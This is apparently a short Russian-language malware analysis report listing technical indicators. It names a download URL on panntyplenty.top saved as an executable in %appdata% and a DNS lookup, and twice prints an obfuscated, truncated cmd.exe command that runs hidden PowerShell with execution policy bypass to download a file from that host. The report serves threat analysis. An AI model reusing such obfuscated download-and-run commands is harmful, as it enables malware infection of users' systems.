Техническая информация
- http://panntyplenty.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "p^o^We^R^sHelL^.ExE^ ^-EX^EC^UTiO^N^poLiCY ^ByPA^s^s^ ^-^noPR^oF^IlE^ -^WIndowSt^YLe^ HId^DeN^ (^Ne^W-o^B^JEcT^ S^Yst^Em.Net.WeBClIeNt).^DOW^nL^O^a^dfi^l^E('http://panntyplen...
- DNS ASK pa####plenty.top
- '<SYSTEM32>\cmd.exe' /C "p^o^We^R^sHelL^.ExE^ ^-EX^EC^UTiO^N^poLiCY ^ByPA^s^s^ ^-^noPR^oF^IlE^ -^WIndowSt^YLe^ HId^DeN^ (^Ne^W-o^B^JEcT^ S^Yst^Em.Net.WeBClIeNt).^DOW^nL^O^a^dfi^l^E('http://panntyplen...' (со скрытым окном)